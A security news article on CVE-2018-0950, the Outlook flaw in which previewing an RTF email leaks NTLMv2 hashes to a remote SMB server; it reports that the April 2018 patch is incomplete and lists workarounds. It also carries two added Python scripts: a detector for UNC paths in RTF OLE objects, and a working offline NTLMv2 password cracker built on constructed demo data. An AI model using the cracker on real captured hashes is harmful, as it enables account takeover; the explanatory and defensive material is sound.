CVE-2018-0950 Not Entirely Fixed in April 2018 Patch Tuesday

Microsoft's April 2018 Patch Tuesday has been rolled out with fixes for 66 security vulnerabilities. One of the more intriguing patches addresses an older Microsoft Outlook flaw that was first reported to Microsoft in 2016.

However, according to Will Dormann, the CERT/CC vulnerability analyst who reported it, the just-released patch is incomplete and additional workarounds are still needed. The bug in question is CVE-2018-0950.

What Is CVE-2018-0950?

Microsoft Outlook automatically retrieves remote OLE content when an RTF email is previewed. When that remote OLE content is hosted on an SMB/CIFS server, the Windows client will attempt to authenticate to the server using NTLM single sign-on (SSO). This may leak the user's IP address, domain name, user name, host name, and password hash, specifically the NTLMv2 challenge-response that the attacker's server observes. If the user's password is not complex enough, an attacker may be able to crack that hash offline in a short amount of time.

The researcher considers the biggest issue to be that Outlook renders the content of remote OLE (Object Linking and Embedding) objects embedded inside rich-text emails automatically, without first prompting the user. OLE objects in documents for other Microsoft Office products such as Word, PowerPoint and Excel are already a common attack vector for malicious actors; Outlook's behaviour extends that exposure to merely previewing a message.

The vulnerability analyst assessed that the bug could be exploited to steal user account credentials, or more precisely NTLM authentication hashes. He demonstrated the exploit by sending an email with an embedded OLE object to an Outlook account; the object pointed to a malicious remote SMB server. By default, the targeted Windows computer tried to authenticate to that server and, in doing so, handed over the user's NTLM hash.
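Because the UNC target of a linked OLE object is buried in the hex-encoded object payload, a plain text search of the RTF body will not find it. The following detector, added here as an example and not taken from the CERT note, Microsoft or the researcher, decodes every \objdata group and reports any \\host\share reference stored as an ANSI or UTF-16LE string. The RTF samples, the host names 10.0.0.5 and files.example.test and the file names are all constructed for the demo.

```python
"""Flag RTF mail bodies whose OLE objects reference a UNC (SMB) path.

Added example; this is not code from the page, from CERT or from Microsoft.
It performs the check a mail gateway or incident responder would run on a raw
RTF body: find every \\objdata group, hex-decode the OLE payload and search it
for \\\\host\\share references stored as ANSI or UTF-16LE strings. The RTF
samples at the bottom are constructed for the demo.
"""
import re

# Hex payload following the \objdata control word; RTF writers wrap it freely.
OBJDATA_RE = re.compile(r"\\objdata\s*([0-9A-Fa-f\s]*)")
# Linked (as opposed to purely embedded) objects are the ones that pull remote content.
LINKED_OBJECT_RE = re.compile(r"\\(objautlink|objlink)\b")
# UNC path as OLE link structures store it: NUL-terminated ANSI or UTF-16LE.
UNC_ANSI_RE = re.compile(rb"\\\\[A-Za-z0-9.\-]{1,253}\\[^\x00]{1,260}")
UNC_UTF16_RE = re.compile(
    rb"\\\x00\\\x00(?:[A-Za-z0-9.\-]\x00){1,253}\\\x00(?:[^\x00]\x00){1,260}")


def _decode_objdata(hexblob: str) -> bytes:
    hexstr = re.sub(r"\s+", "", hexblob)
    if len(hexstr) % 2:          # a truncated writer can leave a dangling nibble
        hexstr = hexstr[:-1]
    return bytes.fromhex(hexstr)


def find_unc_references(rtf: str) -> list:
    """Return every UNC path found inside any OLE object payload of the RTF."""
    found = []
    for m in OBJDATA_RE.finditer(rtf):
        blob = _decode_objdata(m.group(1))
        found += [x.group().decode("latin-1") for x in UNC_ANSI_RE.finditer(blob)]
        found += [x.group().decode("utf-16-le") for x in UNC_UTF16_RE.finditer(blob)]
    return found


def assess(rtf: str) -> dict:
    """Verdict for one message: is an object linked, and which UNC targets does it carry?"""
    unc_paths = find_unc_references(rtf)
    return {
        "linked_object": bool(LINKED_OBJECT_RE.search(rtf)),
        "unc_paths": unc_paths,
        "suspicious": bool(unc_paths),
    }


# --- constructed samples (not real mail) ---
def _rtf_with_object(kind: str, payload: bytes) -> str:
    return ("{\\rtf1\\ansi {\\object" + kind + "{\\*\\objclass Package}"
            "{\\*\\objdata " + payload.hex() + "}} quarterly numbers attached}")


RTF_EMBEDDED_LOCAL = _rtf_with_object(
    "\\objemb", b"\x01\x05\x00\x00\x02\x00\x00\x00Package\x00local data only\x00")
RTF_LINKED_ANSI = _rtf_with_object(
    "\\objautlink", b"\x01\x05\x00\x00" + b"\\\\10.0.0.5\\share\\invoice.rtf\x00")
RTF_LINKED_UTF16 = _rtf_with_object(
    "\\objautlink",
    b"\x01\x05\x00\x00"
    + "\\\\files.example.test\\docs\\q1.rtf".encode("utf-16-le") + b"\x00\x00")

if __name__ == "__main__":
    for name, body in (("embedded-local", RTF_EMBEDDED_LOCAL),
                       ("linked-ansi", RTF_LINKED_ANSI),
                       ("linked-utf16", RTF_LINKED_UTF16)):
        print(name, assess(body))
```

Feed it the raw RTF body of the message (from the .msg/.eml or the MAPI compressed-RTF property once decompressed). A hit on a UNC path inside an object is a strong signal on its own; the linked-object flag is extra context, since an embedded object can also carry a UNC string without Outlook fetching anything.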

Taking advantage of this attack vector is quite easy: the attacker collects the hashes, cracks them offline, and uses the recovered credentials to get into the victim's system. Other components of the internal network that accept the same credentials could also be affected.
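To make the offline step concrete, the following added example (my own code, not the researcher's or the page's) reproduces both halves of the chain: the victim side computes the NTLMv2 response that the attacker's SMB server records, and the attacker side recomputes that response for candidate passwords until one matches. The user name, domain, password, server challenge, blob and wordlist are all constructed for the demo; the MD4 implementation is included because the NT hash is MD4 of the password and many OpenSSL 3 builds of Python no longer expose MD4 through hashlib.

```python
"""Offline attack on a captured Net-NTLMv2 authentication.

Added example, not code from the page, Microsoft or CERT. Victim side: build
the NTLMv2 response a rogue SMB server sees. Attacker side: guess passwords
offline until the recomputed response matches. All demo data is constructed.
"""
import hashlib
import hmac
import struct
from typing import Optional

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320) in pure Python; hashlib.new('md4') is often disabled."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64)             # pad to 56 mod 64
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a = rotl((a + func(b, c, d) + x[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c                  # rotate roles, as in the RFC table
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); NTLM derives everything from this."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(password: str, user: str, domain: str,
                 server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr per MS-NLMP: HMAC-MD5 keyed by NTOWFv2 over challenge||blob,
    where NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))."""
    ntowf_v2 = hmac.new(nt_hash(password),
                        (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(ntowf_v2, server_challenge + blob, hashlib.md5).digest()


def capture_line(user: str, domain: str, server_challenge: bytes,
                 proof: bytes, blob: bytes) -> str:
    """Same layout Responder and hashcat mode 5600 use: user::domain:chal:proof:blob."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_ntlmv2(capture: str, wordlist) -> Optional[str]:
    """Attacker side: recompute NTProofStr per candidate; no network contact needed."""
    user, _, domain, chal_hex, proof_hex, blob_hex = capture.split(":")
    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_proof(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


# --- constructed demo data (not a real capture) ---
VICTIM_USER, VICTIM_DOMAIN, VICTIM_PASSWORD = "jdoe", "CORP", "Welcome1"
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")    # chosen by the rogue SMB server
BLOB = (bytes.fromhex("0101000000000000")                # version + reserved
        + bytes.fromhex("00d0b3f5a1c2d301")              # timestamp (constructed)
        + bytes.fromhex("a1b2c3d4e5f60718")              # client challenge (constructed)
        + b"\x00" * 8)                                   # reserved + empty AV pairs
WORDLIST = ["Password1", "Summer2018", "Welcome1", "Corp2018!"]


def victim_authenticates() -> str:
    """What the rogue SMB server records when Outlook previews the mail."""
    proof = ntlmv2_proof(VICTIM_PASSWORD, VICTIM_USER, VICTIM_DOMAIN, SERVER_CHALLENGE, BLOB)
    return capture_line(VICTIM_USER, VICTIM_DOMAIN, SERVER_CHALLENGE, proof, BLOB)


if __name__ == "__main__":
    cap = victim_authenticates()
    print("captured :", cap)
    print("recovered:", crack_ntlmv2(cap, WORDLIST))
```

The capture line is exactly what hashcat mode 5600 consumes, so in practice the loop above is replaced by a GPU and a large wordlist. The demo makes the page's point: once the hash has left the machine, the only thing protecting the account is how resistant the password is to guessing.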

What Is the Issue with Microsoft’s Patch?

Apparently, the company addressed the vulnerability only partially: the patch stops Outlook from automatically initiating SMB connections when an RTF email is previewed, but Outlook still renders remote OLE content without prompting the user, which is the behaviour the researcher originally reported. He informed Microsoft about the OLE issue behind CVE-2018-0950 in November 2016. Eighteen months later, Microsoft has finally issued a patch in the April 2018 Patch Tuesday, but, as it turns out, the patch only fixes the issue halfway. The core of the problem remains unsolved.

Nonetheless, the patch for this vulnerability is still crucial and should be applied immediately.


As for the workarounds:

1. Block inbound and outbound SMB connections at your network border (445/tcp, 137/tcp and 139/tcp, plus 137/udp and 139/udp), so that a client cannot reach an attacker-controlled SMB server on the Internet; note that this does not help against a rogue SMB server that already sits inside the network;
2. Block NTLM Single Sign-on (SSO) authentication to remote servers, for example with the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" Group Policy setting, so that no NTLM hash is sent out automatically;
3. Use complex passwords, so that a captured NTLM hash cannot be cracked in a useful amount of time.

More details are available in the advisory published on CERT's vulnerability notes database (VU#974272).

Milena Dimitrova
